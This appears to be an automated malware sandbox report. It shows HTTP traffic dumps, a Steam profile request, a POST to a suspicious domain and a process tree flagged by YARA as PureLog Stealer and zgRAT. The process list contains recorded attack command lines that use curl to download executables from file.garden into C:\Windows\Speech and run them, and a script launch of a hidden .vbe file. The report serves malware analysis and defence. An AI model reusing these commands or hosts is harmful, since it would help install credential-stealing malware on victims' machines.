                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: f9 d8 b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d 50 7e aa b6 63 87 b0 74
                                                                                                                                                                                                    Data Ascii: }> :?mQEB_|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]P~ct
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: c2 e3 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b e2 6a 04 70 2d da f3 d4
                                                                                                                                                                                                    Data Ascii: _(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+jp-
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: 47 9a 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 ad 97 5a f9 ff 8d 05 a2
                                                                                                                                                                                                    Data Ascii: GB;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6Z
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: 33 8e da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a 56 cb 03 97 dc 95 c2 9d
                                                                                                                                                                                                    Data Ascii: 3,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}jV
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: 67 d8 fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 94 e6 63 89 1f 5f 04 98
                                                                                                                                                                                                    Data Ascii: gxJfS{~ZsN\pVw`d[rcEDb=B|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA|yUsmje|\<_td $}d4Nl6*fc_
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: 41 c4 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 a7 90 8a 89 65 d3 70 24
                                                                                                                                                                                                    Data Ascii: A!r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<*:eyy}VTZZ=,$Gz*\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~ep$
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: e9 2e bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 ea d9 ed 33 b5 05 f6 31
                                                                                                                                                                                                    Data Ascii: .h!L3y8s6}*.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</|L|[2}cr"DeN)vv_eH*4jnm$WS_k5c:TiNSRjX*'TD|K{31


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    2192.168.2.849710104.102.49.2544435012C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-09-30 16:25:34 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                    2024-09-30 16:25:35 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:25:35 GMT
                                                                                                                                                                                                    Content-Length: 34678
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: sessionid=454e6150a430a2bb1e41ed62; Path=/; Secure; SameSite=None
                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                    2024-09-30 16:25:35 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                    2024-09-30 16:25:35 UTC16384INData Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f
                                                                                                                                                                                                    Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
                                                                                                                                                                                                    2024-09-30 16:25:35 UTC3768INData Raw: 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: eLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content ">
                                                                                                                                                                                                    2024-09-30 16:25:35 UTC12INData Raw: 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: dy></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    3192.168.2.849711104.21.84.2134435012C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-09-30 16:25:36 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                    Host: offeviablwke.site
                                                                                                                                                                                                    2024-09-30 16:25:36 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                    2024-09-30 16:25:36 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:25:36 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: PHPSESSID=ftj8h3bogh6fl4f1200m33os1u; expires=Fri, 24 Jan 2025 10:12:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2F0Hw7gmq1CETxGAoIQWq6YQvDXyRWNVcf2IfhTZA9ImKd9XKBQkYdhvPqKeL3MbH9%2FjnNyK52KgZQB%2Bemz3IQhouFYJG1a%2FyGPxjEVgZ5Y7r84GgIv3n3%2FZ0Bz3YQWA49xoGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 8cb591e179fe420a-EWR
                                                                                                                                                                                                    2024-09-30 16:25:36 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                                                    2024-09-30 16:25:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:12:25:22
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\4tXm5yPtiy.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\4tXm5yPtiy.exe"
                                                                                                                                                                                                    Imagebase:0x7ff68b480000
                                                                                                                                                                                                    File size:628'224 bytes
                                                                                                                                                                                                    MD5 hash:CC9824F9940392C9172E05078982CAAB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                    Start time:12:25:22
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                    Start time:12:25:27
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                    Imagebase:0x7ff7f6c90000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:12:25:27
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                    Imagebase:0x7ff6c5840000
                                                                                                                                                                                                    File size:530'944 bytes
                                                                                                                                                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                    Start time:12:25:29
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\Speech\kdmapper.exe"
                                                                                                                                                                                                    Imagebase:0x150000
                                                                                                                                                                                                    File size:2'284'739 bytes
                                                                                                                                                                                                    MD5 hash:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:12:25:29
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                    Imagebase:0x7ff7f6c90000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:12:25:29
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                    Imagebase:0x7ff6c5840000
                                                                                                                                                                                                    File size:530'944 bytes
                                                                                                                                                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:12:25:30
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                                                                                                                                                                                    Imagebase:0xe50000
                                                                                                                                                                                                    File size:147'456 bytes
                                                                                                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                    Start time:12:25:31
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\Speech\physmeme.exe"
                                                                                                                                                                                                    Imagebase:0x460000
                                                                                                                                                                                                    File size:370'176 bytes
                                                                                                                                                                                                    MD5 hash:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 61%, ReversingLabs
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                    Start time:12:25:31
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
